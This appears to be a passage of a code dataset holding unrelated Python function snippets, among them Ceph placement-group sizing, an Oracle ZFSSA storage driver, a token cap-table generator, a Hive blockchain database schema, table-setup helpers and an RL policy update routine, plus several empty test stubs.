_set_pg_count_storage_parameters(cls, data, nodes):\n osd_num = 0\n osd_nodes = [node for node in nodes\n if 'ceph-osd' in node.all_roles]\n\n for node in osd_nodes:\n for disk in cls.get_node_volumes(node):\n for part in disk.get('volumes', []):\n if part.get('name') == 'ceph' and part.get('size', 0) > 0:\n osd_num += 1\n\n for node in 
data:\n storage_attrs = node['storage']\n\n pg_counts = get_pool_pg_count(\n osd_num=osd_num,\n pool_sz=int(storage_attrs['osd_pool_size']),\n ceph_version='firefly',\n volumes_ceph=storage_attrs['volumes_ceph'],\n objects_ceph=storage_attrs['objects_ceph'],\n ephemeral_ceph=storage_attrs['ephemeral_ceph'],\n images_ceph=storage_attrs['images_ceph'],\n emulate_pre_7_0=False)\n\n # Log {pool_name: pg_count} mapping\n pg_str = \", \".join(map(\"{0[0]}={0[1]}\".format, pg_counts.items()))\n logger.debug(\"Ceph: PG values {%s}\", pg_str)\n\n storage_attrs['pg_num'] = pg_counts['default_pg_num']\n storage_attrs['per_pool_pg_nums'] = pg_counts", "def _update_volume_stats(self):\n self._ensure_shares_mounted()\n data = {}\n lcfg = self.configuration\n backend_name = self.configuration.safe_get('volume_backend_name')\n data['volume_backend_name'] = backend_name or self.__class__.__name__\n data['vendor_name'] = 'Oracle'\n data['driver_version'] = self.VERSION\n data['storage_protocol'] = self.protocol\n\n asn = self.zfssa.get_asn()\n data['location_info'] = '%s:%s' % (asn, lcfg.zfssa_nfs_share)\n\n free, used = self._get_share_capacity_info()\n capacity = float(free) + float(used)\n ratio_used = used / capacity\n\n data['QoS_support'] = False\n data['reserved_percentage'] = 0\n\n used_percentage_limit = 100 - self.configuration.reserved_percentage\n used_ratio_limit = used_percentage_limit / 100.0\n if (ratio_used > used_ratio_limit or\n ratio_used >= self.configuration.max_over_subscription_ratio):\n data['reserved_percentage'] = 100\n\n data['total_capacity_gb'] = float(capacity) / units.Gi\n data['free_capacity_gb'] = float(free) / units.Gi\n\n share_details = self.zfssa.get_share(lcfg.zfssa_nfs_pool,\n lcfg.zfssa_nfs_project,\n lcfg.zfssa_nfs_share)\n pool_details = self.zfssa.get_pool_details(lcfg.zfssa_nfs_pool)\n\n data['zfssa_compression'] = share_details['compression']\n data['zfssa_encryption'] = share_details['encryption']\n data['zfssa_logbias'] = share_details['logbias']\n data['zfssa_poolprofile'] = pool_details['profile']\n data['zfssa_sparse'] = six.text_type(lcfg.nfs_sparsed_volumes)\n\n self._stats = data", "def test_create_hyperflex_ext_fc_storage_policy(self):\n pass", "def generate_cap_table(logger: Logger,\n dbsession: Session,\n token_address: str,\n order_by: str,\n order_direction: str,\n identity_provider: IdentityProvider,\n include_empty: bool,\n TokenScanStatus: type,\n TokenHolderAccount: type,\n no_name=\"<Unknown>\") -> CapTableInfo:\n\n status = dbsession.query(TokenScanStatus).filter_by(address=token_address).one_or_none() # type: TokenScanStatus\n if not status or status.end_block is None:\n raise NeedsTokenScan(\n \"No token {} balances available in the local database. 
Please run tokfetch token-scan first.\".format(\n token_address))\n\n q = status.get_accounts(include_empty)\n\n results = []\n total_balance = Decimal(0)\n last_token_transfer_at = datetime.datetime(1970, 1, 1, tzinfo=datetime.timezone.utc)\n for holder in q:\n\n id_check = identity_provider.get_identity(holder.address)\n if id_check:\n name = id_check.name\n else:\n name = no_name\n\n decimal_balance = holder.get_decimal_balance()\n\n entry = CapTableEntry(name, holder.address, decimal_balance, holder.last_block_updated_at)\n\n if entry.updated_at > last_token_transfer_at:\n last_token_transfer_at = entry.updated_at\n results.append(entry)\n\n if decimal_balance > 0: # Ignore cases where we cannot detect mint transaction\n total_balance += decimal_balance\n\n sort_entries(results, order_by, order_direction)\n\n # Retrofit decimal balances after we know the total sum\n if total_balance > 0:\n for r in results:\n r.percent = r.balance / total_balance\n\n info = CapTableInfo(status, last_token_transfer_at, total_balance, results)\n\n return info", "def pre_network_policy_create(self, resource_dict):\n pass", "def test_cap_table_formats(logger, dbsession, network, scanned_distribution, web3):\n\n identity_provider = NullIdentityProvider()\n\n token_address = scanned_distribution\n for sort_direction in [\"asc\", \"desc\"]:\n for sort_order in [\"address\", \"name\", \"balance\", \"updated\"]:\n generate_cap_table(\n logger,\n dbsession,\n token_address,\n order_by=sort_order,\n identity_provider=identity_provider,\n order_direction=sort_direction,\n include_empty=False,\n TokenScanStatus=TokenScanStatus,\n TokenHolderAccount=TokenHolderAccount,\n )", "def build_metadata():\n metadata = sa.MetaData()\n\n sa.Table(\n 'hive_blocks', metadata,\n sa.Column('num', sa.Integer, primary_key=True, autoincrement=False),\n sa.Column('hash', CHAR(40), nullable=False),\n sa.Column('prev', CHAR(40)),\n sa.Column('txs', SMALLINT, server_default='0', nullable=False),\n sa.Column('ops', SMALLINT, server_default='0', nullable=False),\n sa.Column('created_at', sa.DateTime, nullable=False),\n\n sa.UniqueConstraint('hash', name='hive_blocks_ux1'),\n sa.ForeignKeyConstraint(['prev'], ['hive_blocks.hash'], name='hive_blocks_fk1'),\n )\n\n sa.Table(\n 'hive_accounts', metadata,\n sa.Column('id', sa.Integer, primary_key=True),\n sa.Column('name', VARCHAR(16), nullable=False),\n sa.Column('created_at', sa.DateTime, nullable=False),\n #sa.Column('block_num', sa.Integer, nullable=False),\n sa.Column('reputation', sa.Float(precision=6), nullable=False, server_default='25'),\n\n sa.Column('display_name', sa.String(20)),\n sa.Column('about', sa.String(160)),\n sa.Column('location', sa.String(30)),\n sa.Column('website', sa.String(100)),\n sa.Column('profile_image', sa.String(1024), nullable=False, server_default=''),\n sa.Column('cover_image', sa.String(1024), nullable=False, server_default=''),\n\n sa.Column('followers', sa.Integer, nullable=False, server_default='0'),\n sa.Column('following', sa.Integer, nullable=False, server_default='0'),\n\n sa.Column('proxy', VARCHAR(16), nullable=False, server_default=''),\n sa.Column('post_count', sa.Integer, nullable=False, server_default='0'),\n sa.Column('proxy_weight', sa.Float(precision=6), nullable=False, server_default='0'),\n sa.Column('vote_weight', sa.Float(precision=6), nullable=False, server_default='0'),\n sa.Column('kb_used', sa.Integer, nullable=False, server_default='0'), # deprecated\n sa.Column('rank', sa.Integer, nullable=False, server_default='0'),\n\n 
sa.Column('lastread_at', sa.DateTime, nullable=False, server_default='1970-01-01 00:00:00'),\n sa.Column('active_at', sa.DateTime, nullable=False, server_default='1970-01-01 00:00:00'),\n sa.Column('cached_at', sa.DateTime, nullable=False, server_default='1970-01-01 00:00:00'),\n sa.Column('raw_json', sa.Text),\n\n\n sa.UniqueConstraint('name', name='hive_accounts_ux1'),\n sa.Index('hive_accounts_ix1', 'vote_weight', 'id'), # core: quick ranks\n sa.Index('hive_accounts_ix2', 'name', 'id'), # core: quick id map\n sa.Index('hive_accounts_ix3', 'vote_weight', 'name', postgresql_ops=dict(name='varchar_pattern_ops')), # API: lookup\n sa.Index('hive_accounts_ix4', 'id', 'name'), # API: quick filter/sort\n sa.Index('hive_accounts_ix5', 'cached_at', 'name'), # core/listen sweep\n )\n\n sa.Table(\n 'hive_posts', metadata,\n sa.Column('id', sa.Integer, primary_key=True),\n sa.Column('parent_id', sa.Integer),\n sa.Column('author', VARCHAR(16), nullable=False),\n sa.Column('permlink', VARCHAR(255), nullable=False),\n sa.Column('category', VARCHAR(255), nullable=False, server_default=''),\n sa.Column('community_id', sa.Integer, nullable=True),\n sa.Column('created_at', sa.DateTime, nullable=False),\n sa.Column('depth', SMALLINT, nullable=False),\n sa.Column('is_deleted', BOOLEAN, nullable=False, server_default='0'),\n sa.Column('is_pinned', BOOLEAN, nullable=False, server_default='0'),\n sa.Column('is_muted', BOOLEAN, nullable=False, server_default='0'),\n sa.Column('is_valid', BOOLEAN, nullable=False, server_default='1'),\n sa.Column('promoted', sa.types.DECIMAL(10, 3), nullable=False, server_default='0'),\n\n sa.ForeignKeyConstraint(['author'], ['hive_accounts.name'], name='hive_posts_fk1'),\n sa.ForeignKeyConstraint(['parent_id'], ['hive_posts.id'], name='hive_posts_fk3'),\n sa.UniqueConstraint('author', 'permlink', name='hive_posts_ux1'),\n sa.Index('hive_posts_ix3', 'author', 'depth', 'id', postgresql_where=sql_text(\"is_deleted = '0'\")), # API: author blog/comments\n sa.Index('hive_posts_ix4', 'parent_id', 'id', postgresql_where=sql_text(\"is_deleted = '0'\")), # API: fetching children\n sa.Index('hive_posts_ix5', 'id', postgresql_where=sql_text(\"is_pinned = '1' AND is_deleted = '0'\")), # API: pinned post status\n sa.Index('hive_posts_ix6', 'community_id', 'id', postgresql_where=sql_text(\"community_id IS NOT NULL AND is_pinned = '1' AND is_deleted = '0'\")), # API: community pinned\n )\n\n sa.Table(\n 'hive_post_tags', metadata,\n sa.Column('post_id', sa.Integer, nullable=False),\n sa.Column('tag', sa.String(32), nullable=False),\n sa.UniqueConstraint('tag', 'post_id', name='hive_post_tags_ux1'), # core\n sa.Index('hive_post_tags_ix1', 'post_id'), # core\n )\n\n sa.Table(\n 'hive_follows', metadata,\n sa.Column('follower', sa.Integer, nullable=False),\n sa.Column('following', sa.Integer, nullable=False),\n sa.Column('state', SMALLINT, nullable=False, server_default='1'),\n sa.Column('created_at', sa.DateTime, nullable=False),\n\n sa.UniqueConstraint('following', 'follower', name='hive_follows_ux3'), # core\n sa.Index('hive_follows_ix5a', 'following', 'state', 'created_at', 'follower'),\n sa.Index('hive_follows_ix5b', 'follower', 'state', 'created_at', 'following'),\n )\n\n sa.Table(\n 'hive_reblogs', metadata,\n sa.Column('account', VARCHAR(16), nullable=False),\n sa.Column('post_id', sa.Integer, nullable=False),\n sa.Column('created_at', sa.DateTime, nullable=False),\n\n sa.ForeignKeyConstraint(['account'], ['hive_accounts.name'], name='hive_reblogs_fk1'),\n 
sa.ForeignKeyConstraint(['post_id'], ['hive_posts.id'], name='hive_reblogs_fk2'),\n sa.UniqueConstraint('account', 'post_id', name='hive_reblogs_ux1'), # core\n sa.Index('hive_reblogs_ix1', 'post_id', 'account', 'created_at'), # API -- not yet used\n )\n\n sa.Table(\n 'hive_payments', metadata,\n sa.Column('id', sa.Integer, primary_key=True),\n sa.Column('block_num', sa.Integer, nullable=False),\n sa.Column('tx_idx', SMALLINT, nullable=False),\n sa.Column('post_id', sa.Integer, nullable=False),\n sa.Column('from_account', sa.Integer, nullable=False),\n sa.Column('to_account', sa.Integer, nullable=False),\n sa.Column('amount', sa.types.DECIMAL(10, 3), nullable=False),\n sa.Column('token', VARCHAR(5), nullable=False),\n\n sa.ForeignKeyConstraint(['from_account'], ['hive_accounts.id'], name='hive_payments_fk1'),\n sa.ForeignKeyConstraint(['to_account'], ['hive_accounts.id'], name='hive_payments_fk2'),\n sa.ForeignKeyConstraint(['post_id'], ['hive_posts.id'], name='hive_payments_fk3'),\n )\n\n sa.Table(\n 'hive_feed_cache', metadata,\n sa.Column('post_id', sa.Integer, nullable=False),\n sa.Column('account_id', sa.Integer, nullable=False),\n sa.Column('created_at', sa.DateTime, nullable=False),\n sa.UniqueConstraint('post_id', 'account_id', name='hive_feed_cache_ux1'), # core\n sa.Index('hive_feed_cache_ix1', 'account_id', 'post_id', 'created_at'), # API (and rebuild?)\n )\n\n sa.Table(\n 'hive_posts_cache', metadata,\n sa.Column('post_id', sa.Integer, primary_key=True, autoincrement=False),\n sa.Column('author', VARCHAR(16), nullable=False),\n sa.Column('permlink', VARCHAR(255), nullable=False),\n sa.Column('category', VARCHAR(255), nullable=False, server_default=''),\n\n # important/index\n sa.Column('community_id', sa.Integer, nullable=True),\n sa.Column('depth', SMALLINT, nullable=False, server_default='0'),\n sa.Column('children', SMALLINT, nullable=False, server_default='0'),\n\n # basic/extended-stats\n sa.Column('author_rep', sa.Float(precision=6), nullable=False, server_default='0'),\n sa.Column('flag_weight', sa.Float(precision=6), nullable=False, server_default='0'),\n sa.Column('total_votes', sa.Integer, nullable=False, server_default='0'),\n sa.Column('up_votes', sa.Integer, nullable=False, server_default='0'),\n\n # basic ui fields\n sa.Column('title', sa.String(255), nullable=False, server_default=''),\n sa.Column('preview', sa.String(1024), nullable=False, server_default=''),\n sa.Column('img_url', sa.String(1024), nullable=False, server_default=''),\n\n # core stats/indexes\n sa.Column('payout', sa.types.DECIMAL(10, 3), nullable=False, server_default='0'),\n sa.Column('promoted', sa.types.DECIMAL(10, 3), nullable=False, server_default='0'),\n sa.Column('created_at', sa.DateTime, nullable=False, server_default='1990-01-01'),\n sa.Column('payout_at', sa.DateTime, nullable=False, server_default='1990-01-01'),\n sa.Column('updated_at', sa.DateTime, nullable=False, server_default='1990-01-01'),\n sa.Column('is_paidout', BOOLEAN, nullable=False, server_default='0'),\n\n # ui flags/filters\n sa.Column('is_nsfw', BOOLEAN, nullable=False, server_default='0'),\n sa.Column('is_declined', BOOLEAN, nullable=False, server_default='0'),\n sa.Column('is_full_power', BOOLEAN, nullable=False, server_default='0'),\n sa.Column('is_hidden', BOOLEAN, nullable=False, server_default='0'),\n sa.Column('is_grayed', BOOLEAN, nullable=False, server_default='0'),\n\n # important indexes\n sa.Column('rshares', sa.BigInteger, nullable=False, server_default='0'),\n sa.Column('sc_trend', sa.Float(precision=6), 
nullable=False, server_default='0'),\n sa.Column('sc_hot', sa.Float(precision=6), nullable=False, server_default='0'),\n\n # bulk data\n sa.Column('body', TEXT),\n sa.Column('votes', TEXT),\n sa.Column('json', sa.Text),\n sa.Column('raw_json', sa.Text),\n\n # index: misc\n sa.Index('hive_posts_cache_ix3', 'payout_at', 'post_id', postgresql_where=sql_text(\"is_paidout = '0'\")), # core: payout sweep\n sa.Index('hive_posts_cache_ix8', 'category', 'payout', 'depth', postgresql_where=sql_text(\"is_paidout = '0'\")), # API: tag stats\n\n # index: ranked posts\n sa.Index('hive_posts_cache_ix2', 'promoted', postgresql_where=sql_text(\"is_paidout = '0' AND promoted > 0\")), # API: promoted\n\n sa.Index('hive_posts_cache_ix6a', 'sc_trend', 'post_id', postgresql_where=sql_text(\"is_paidout = '0'\")), # API: trending todo: depth=0\n sa.Index('hive_posts_cache_ix7a', 'sc_hot', 'post_id', postgresql_where=sql_text(\"is_paidout = '0'\")), # API: hot todo: depth=0\n sa.Index('hive_posts_cache_ix6b', 'post_id', 'sc_trend', postgresql_where=sql_text(\"is_paidout = '0'\")), # API: trending, filtered todo: depth=0\n sa.Index('hive_posts_cache_ix7b', 'post_id', 'sc_hot', postgresql_where=sql_text(\"is_paidout = '0'\")), # API: hot, filtered todo: depth=0\n\n sa.Index('hive_posts_cache_ix9a', 'depth', 'payout', 'post_id', postgresql_where=sql_text(\"is_paidout = '0'\")), # API: payout todo: rem depth\n sa.Index('hive_posts_cache_ix9b', 'category', 'depth', 'payout', 'post_id', postgresql_where=sql_text(\"is_paidout = '0'\")), # API: payout, filtered todo: rem depth\n\n sa.Index('hive_posts_cache_ix10', 'post_id', 'payout', postgresql_where=sql_text(\"is_grayed = '1' AND payout > 0\")), # API: muted, by filter/date/payout\n\n # index: stats\n sa.Index('hive_posts_cache_ix20', 'community_id', 'author', 'payout', 'post_id', postgresql_where=sql_text(\"is_paidout = '0'\")), # API: pending distribution; author payout\n\n # index: community ranked posts\n sa.Index('hive_posts_cache_ix30', 'community_id', 'sc_trend', 'post_id', postgresql_where=sql_text(\"community_id IS NOT NULL AND is_grayed = '0' AND depth = 0\")), # API: community trend\n sa.Index('hive_posts_cache_ix31', 'community_id', 'sc_hot', 'post_id', postgresql_where=sql_text(\"community_id IS NOT NULL AND is_grayed = '0' AND depth = 0\")), # API: community hot\n sa.Index('hive_posts_cache_ix32', 'community_id', 'created_at', 'post_id', postgresql_where=sql_text(\"community_id IS NOT NULL AND is_grayed = '0' AND depth = 0\")), # API: community created\n sa.Index('hive_posts_cache_ix33', 'community_id', 'payout', 'post_id', postgresql_where=sql_text(\"community_id IS NOT NULL AND is_grayed = '0' AND is_paidout = '0'\")), # API: community payout\n sa.Index('hive_posts_cache_ix34', 'community_id', 'payout', 'post_id', postgresql_where=sql_text(\"community_id IS NOT NULL AND is_grayed = '1' AND is_paidout = '0'\")), # API: community muted\n )\n\n sa.Table(\n 'hive_state', metadata,\n sa.Column('block_num', sa.Integer, primary_key=True, autoincrement=False),\n sa.Column('db_version', sa.Integer, nullable=False),\n sa.Column('steem_per_mvest', sa.types.DECIMAL(8, 3), nullable=False),\n sa.Column('usd_per_steem', sa.types.DECIMAL(8, 3), nullable=False),\n sa.Column('sbd_per_steem', sa.types.DECIMAL(8, 3), nullable=False),\n sa.Column('dgpo', sa.Text, nullable=False),\n )\n\n metadata = build_metadata_community(metadata)\n\n metadata = build_metadata_blacklist(metadata)\n\n metadata = build_trxid_block_num(metadata)\n\n return metadata", "def 
load_status_table():", "def _update_suspicion_0(self):\n\n for bucket in self.used_buckets:\n multiplier = 1 if bucket.attacked else 0\n for user in bucket.users:\n user.suspicion += (1 / len(bucket)) * multiplier", "def _populate_table_status():\n [db_insert_or_get(Status, name=name) for name in app.config['STATUS_DICT'][1:]]\n db.session.commit()", "def _update_suspicion_0(self):\n\n for bucket in self.buckets:\n multiplier = 1 if bucket.attacked else 0\n for user in bucket.users:\n user.suspicion += (1 / len(bucket)) * multiplier", "def _create_intermediate_old_tables_structure(self, conn):\n table_names = []\n with conn.cursor() as cursor, CodeProfiler() as cp:\n tblname = self._blacklist_old_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n imei_norm TEXT NOT NULL,\n virt_imei_shard SMALLINT NOT NULL,\n block_date DATE NOT NULL,\n reasons TEXT[] NOT NULL\n ) PARTITION BY RANGE (virt_imei_shard)\n \"\"\").format(sql.Identifier(tblname)))\n partition_utils.create_imei_shard_partitions(conn, tbl_name=tblname, unlogged=True)\n table_names.append(tblname)\n\n tblname = self._notifications_lists_old_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n operator_id TEXT NOT NULL,\n imei_norm TEXT NOT NULL,\n virt_imei_shard SMALLINT NOT NULL,\n imsi TEXT NOT NULL,\n msisdn TEXT NOT NULL,\n block_date DATE NOT NULL,\n reasons TEXT[] NOT NULL,\n amnesty_granted BOOLEAN\n ) PARTITION BY LIST (operator_id)\n \"\"\").format(sql.Identifier(tblname)))\n table_names.append(tblname)\n self._create_operator_partitions(conn,\n parent_tbl_name=tblname,\n child_name_fn=self._notifications_lists_old_part_tblname,\n is_unlogged=True)\n\n tblname = self._exceptions_lists_old_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n operator_id TEXT NOT NULL,\n imei_norm TEXT NOT NULL,\n virt_imei_shard SMALLINT NOT NULL,\n imsi TEXT NOT NULL\n ) PARTITION BY LIST (operator_id)\n \"\"\").format(sql.Identifier(tblname)))\n table_names.append(tblname)\n self._create_operator_partitions(conn,\n parent_tbl_name=tblname,\n child_name_fn=self._exceptions_lists_old_part_tblname,\n is_unlogged=True)\n\n self._intermediate_table_names.extend(table_names)\n return -1, cp.duration", "def get_total_stateless(db):\n pass", "def create_statistics(self):\n now = datetime.now()\n min_timestamp = Statistic.objects.all().aggregate(Max('timestamp_end'))[\"timestamp_end__max\"]\n max_timestamp = (now + ((datetime.min - now) % timedelta(minutes=60)) - timedelta(minutes=60)).replace(tzinfo=pytz.UTC)\n\n if min_timestamp is None:\n min_timestamp = datetime(2000, 1, 1, tzinfo=timezone('UTC'))\n\n aggregated_measurements = MeasurementService.get_aggregate_measurements(min_timestamp,max_timestamp)\n StatisticService.create_statistics(aggregated_measurements)", "def create_tradeoff_history(number_of_turns, policies):\n tradeoff_history = dict()\n for policy in policies:\n tradeoff_history[policy]=[False]*number_of_turns\n return tradeoff_history", "def store(self, context):\n values = {\n 'enabled': self.enabled,\n 'data': self.data,\n 'last_op': self.last_op,\n 'priority': self.priority\n }\n\n if self.id:\n cpo.ClusterPolicy.update(context, self.cluster_id, self.policy_id,\n values)\n else:\n binding = cpo.ClusterPolicy.create(context, self.cluster_id,\n self.policy_id, values)\n self.cluster_name = binding.cluster.name\n self.policy_name = binding.policy.name\n self.policy_type = binding.policy.type\n self.id = binding.id\n\n return self.id", "def policy(self) -> 
typing.Optional[\"BucketPolicy\"]:\n ...", "def test_patch_hyperflex_cluster_storage_policy(self):\n pass", "def __init__(self, policy: TypePolicy, byte_size: int, flags: int, bin: TypeBinName): \n self._children= (\n byte_size,\n _GenericExpr(_ExprOp._AS_EXP_BIT_FLAGS, 0, {_Keys.VALUE_KEY: policy['bit_write_flags']} if policy is not None and 'bit_write_flags' in policy else {_Keys.VALUE_KEY: 0}),\n _GenericExpr(_ExprOp._AS_EXP_BIT_FLAGS, 0, {_Keys.VALUE_KEY: flags} if flags is not None else {_Keys.VALUE_KEY: 0}),\n bin if isinstance(bin, _BaseExpr) else BlobBin(bin)\n )", "def test_get_hyperflex_cluster_storage_policy_list(self):\n pass", "def adapter_policy_create(handle, name, descr=\"\", parent_dn=\"org-root\"):\n\n from ucsmsdk.mometa.adaptor.AdaptorHostEthIfProfile import \\\n AdaptorHostEthIfProfile\n\n obj = handle.query_dn(parent_dn)\n if not obj:\n raise ValueError(\"org '%s' does not exist\" % parent_dn)\n\n mo = AdaptorHostEthIfProfile(parent_mo_or_dn=obj, name=name, descr=descr)\n handle.add_mo(mo, modify_present=True)\n handle.commit()\n return mo", "def setting(self):\n conn = sqlite3.connect(self.filename)\n logging.info(\"Opened database successfully\")\n try:\n conn.execute('''DROP TABLE IF EXISTS PRECIPITATION;''')\n conn.execute('''CREATE TABLE PRECIPITATION (\n Xref INTEGER,\n Yref INTEGER,\n Date TEXT,\n Value INTEGER\n );'''\n )\n self.count('before')\n except:\n pass\n conn.close()", "def _convert_policy_to_index(self, req):\n policy_name = req.headers.get('X-Storage-Policy')\n if not policy_name:\n return\n policy = POLICIES.get_by_name(policy_name)\n if not policy:\n raise HTTPBadRequest(request=req,\n content_type=\"text/plain\",\n body=(\"Invalid %s '%s'\"\n % ('X-Storage-Policy', policy_name)))\n if policy.is_deprecated:\n body = 'Storage Policy %r is deprecated' % (policy.name)\n raise HTTPBadRequest(request=req, body=body)\n return int(policy)", "def test_list_cluster_policy(self):\n pass", "def test_create_cluster_policy_binding(self):\n pass", "def cleanup_policy_create(ctx: click.Context, **kwargs):\n # TODO: use a click type for this check?\n criteria_keys = {'downloaded', 'updated', 'regex'}\n util.move_to_key(kwargs, 'criteria', criteria_keys)\n\n util.rename_keys(kwargs['criteria'], {\n 'downloaded': 'lastDownloaded',\n 'updated': 'lastBlobUpdated',\n })\n\n subcommand_cleanup_policy.cmd_create(ctx.obj, **kwargs)", "def create_UAG_table_in_sql(sql_cursor):\n sql_cursor.execute('''DROP TABLE IF EXISTS uag_complete;''')\n sql_cursor.execute(\n '''CREATE TABLE uag_complete (\n _id integer PRIMARY KEY, \n user_id varchar(50),\n age_bucket varchar(20),\n age_avg varchar(20),\n gender_bucket varchar(20),\n source varchar(30));\n ''')", "def policy(agent):", "def setup_table(self):\n self.interface.start_transaction()\n self.interface.drop_table(_history_table)\n self.interface.drop_table(_history_stats_table)\n self.interface.create_table(_history_table)\n self.interface.create_index('index1', _history_table, [_history_table['timestamp']])\n self.interface.create_table(_history_stats_table)\n self.interface.create_index('index2', _history_stats_table, [_history_stats_table['benchmark']])\n self.interface.commit_transaction()", "def update_policy(self):\n self.trainer_metrics.start_policy_update_timer(\n number_experiences=len(self.training_buffer.update_buffer[\"actions\"]),\n mean_return=float(np.mean(self.cumulative_returns_since_policy_update)),\n )\n self.cumulative_returns_since_policy_update = []\n n_sequences = max(\n 
int(self.trainer_parameters[\"batch_size\"] / self.policy.sequence_length), 1\n )\n value_total, policy_total = [], []\n advantages = self.training_buffer.update_buffer[\"advantages\"].get_batch()\n self.training_buffer.update_buffer[\"advantages\"].set(\n (advantages - advantages.mean()) / (advantages.std() + 1e-10)\n )\n num_epoch = self.trainer_parameters[\"num_epoch\"]\n for _ in range(num_epoch):\n self.training_buffer.update_buffer.shuffle()\n buffer = self.training_buffer.update_buffer\n for l in range(\n len(self.training_buffer.update_buffer[\"actions\"]) // n_sequences\n ):\n start = l * n_sequences\n end = (l + 1) * n_sequences\n run_out = self.policy.update(\n buffer.make_mini_batch(start, end), n_sequences\n )\n value_total.append(run_out[\"value_loss\"])\n policy_total.append(np.abs(run_out[\"policy_loss\"]))\n self.stats[\"Losses/Value Loss\"].append(np.mean(value_total))\n self.stats[\"Losses/Policy Loss\"].append(np.mean(policy_total))\n for _, reward_signal in self.policy.reward_signals.items():\n update_stats = reward_signal.update(\n self.training_buffer.update_buffer, n_sequences\n )\n for stat, val in update_stats.items():\n self.stats[stat].append(val)\n if self.policy.bc_module:\n update_stats = self.policy.bc_module.update()\n for stat, val in update_stats.items():\n self.stats[stat].append(val)\n self.training_buffer.reset_update_buffer()\n self.trainer_metrics.end_policy_update()", "def new_capacity_rule(mod, prj, prd):\n return 0", "def baseline_statistics(self, **_):\n raise NotImplementedError(\"{} doesn't support statistics.\".format(__class__.__name__))", "def _update_suspicion_2(self):\n\n for bucket in self.buckets:\n multiplier = 1 if bucket.attacked else -1\n for user in bucket.users:\n user.suspicion += (1 / len(bucket)) * multiplier", "def add_policy(self, policy, epochs=None, starting_epoch=0, ending_epoch=1, frequency=1):\n\n if epochs is None:\n epochs = list(range(starting_epoch, ending_epoch, frequency))\n\n for epoch in epochs:\n if epoch not in self.policies:\n self.policies[epoch] = [policy]\n else:\n self.policies[epoch].append(policy)\n assert len(self.policies[epoch]) > 0\n \n self.sched_metadata[policy] = {'starting_epoch': starting_epoch,\n 'ending_epoch': ending_epoch,\n 'frequency': frequency}\n\n class_name = policy.__class__.__name__.split(\"Policy\")[0]\n \n if \"Remover\" in class_name:\n self.thinning = True\n self.thinning_epoch = epochs\n\n # In the following code, we save the maximum and minimum epochs withing all pruners.\n # This is designed for distingushing the \"pretrain\", \"ADMM pruning\" and \"retrain\" phase. 
\n # Toward this end, we are able to tune the initial learning rate in an automative way.\n if class_name in ['ADMM', \"Pruning\"]:\n self.prune_mechanism = True\n if 'max_epoch' in self.pruner_info:\n if ending_epoch > self.pruner_info['max_epoch']:\n self.pruner_info['max_epoch'] = ending_epoch\n else:\n self.pruner_info['max_epoch'] = ending_epoch\n \n if class_name == 'ADMM':\n self.admm_prune = True\n # Can not deal with seperate ADMM pruner.\n self.pruner_info[\"ADMM_epoch\"] = ending_epoch\n\n if 'min_epoch' in self.pruner_info:\n if starting_epoch < self.pruner_info['min_epoch']:\n self.pruner_info['min_epoch'] = starting_epoch\n else:\n self.pruner_info['min_epoch'] = starting_epoch", "def _update_suspicion_2(self):\n\n for bucket in self.used_buckets:\n multiplier = 1 if bucket.attacked else -1\n for user in bucket.users:\n user.suspicion += (1 / len(bucket)) * multiplier", "def policies(self, value):\n policies = {}\n for domain, obj in six.iteritems(value):\n if isinstance(obj, Policy):\n policies[domain] = obj\n else:\n policies[domain] = Policy(obj, self.policy_aliases)\n self._set_attr('policies', policies)", "def _store_query_percentiles_table(self):\n constraint_list = self._config.get_constraint_list(\n require_correct=True)\n categories = self._config.results_db.get_unique_query_values(\n simple_fields=[(t1s.DBF_TABLENAME, t1s.DBF_NUMRECORDS),\n (t1s.DBF_TABLENAME, t1s.DBF_RECORDSIZE),\n (t1s.DBP_TABLENAME, t1s.DBP_SELECTIONCOLS),\n (t1s.DBF_TABLENAME, t1s.DBF_CAT)],\n constraint_list=constraint_list)\n # create the percentiles table:\n caption = \"Number of Percentiles passing the $%s+%sx$ requirement\" % (\n str(self._config.a_req), str(self._config.b_req))\n percentiles_table = latex_classes.LatexTable(\n caption, \"perc_main\",\n [\"DBNR\", \"DBRS\", \"Select\", \"Query Type\", \"Num Passing $\\%$iles\"])\n # compute number of percentiles met for every query category:\n for (dbnr, dbrs, selection_cols, query_cat) in categories:\n inp = t1ai.Input()\n inp[t1s.DBF_CAT] = query_cat\n inp[t1s.DBF_NUMRECORDS] = dbnr\n inp[t1s.DBF_RECORDSIZE] = dbrs\n inp[t1s.DBP_SELECTIONCOLS] = selection_cols\n performer_constraint_list = self._config.get_constraint_list(\n usebaseline=False) + inp.get_constraint_list()\n baseline_constraint_list = self._config.get_constraint_list(\n usebaseline=True) + inp.get_constraint_list()\n percentile_getter = percentiles.Ta1PercentileGetter(\n self._config.results_db, performer_constraint_list,\n baseline_constraint_list)\n if percentile_getter.has_values():\n all_met = percentile_getter.get_all_met(\n self._config.a_req, self._config.b_req)\n percentiles_table.add_content([\n inp.test_db.get_db_num_records_str(),\n inp.test_db.get_db_record_size_str(), selection_cols,\n query_cat, len(all_met)])\n self._outp[\"query_percentiles_table\"] = percentiles_table.get_string()", "def _compute_hybridized_profile_components(self):\n\n for params in self.__rep_profile_hybridization_params:\n col, (hybrid_idxs, solar_idxs), fpath, p_name, dset_name = params\n capacity = self.hybrid_meta.loc[hybrid_idxs, col].values\n\n with Resource(fpath) as res:\n data = res[dset_name,\n res.time_index.isin(self.hybrid_time_index)]\n self._profiles[p_name][:, hybrid_idxs] = (data[:, solar_idxs]\n * capacity)", "def __init__(self):\n self.account = None\n self.typeInfo['account'] = 'string'\n \"\"\"the domain of the HealthCheck policy\"\"\"\n self.domain = None\n self.typeInfo['domain'] = 'string'\n \"\"\"the domain ID of the HealthCheck policy\"\"\"\n self.domainid = 
